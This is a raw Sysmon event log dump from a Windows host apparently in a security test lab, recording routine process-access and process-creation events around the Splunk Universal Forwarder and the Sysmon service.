13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007291Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007290Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007289Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007288Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007287Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007286Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007285Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-85EA-5FCF-2D01-000000009101}3168C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007284Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-85EA-5FCF-2C01-000000009101}41404276C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85EA-5FCF-2D01-000000009101}3168C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007283Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.179{10ACEC4A-85EA-5FCF-2D01-000000009101}3168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000007282Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007281Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007280Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007279Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007278Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007277Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007276Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007275Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007274Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007273Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007272Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007271Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-85EA-5FCF-2B01-000000009101}42484316C:\Windows\system32\cmd.exe{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007270Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.171{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{10ACEC4A-85EA-5FCF-2B01-000000009101}4248C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 2>&1 10341000x80000000000000007269Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.167{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85EA-5FCF-2B01-000000009101}4248C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007268Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.152{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007267Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.152{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007266Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:54.152{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007265Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 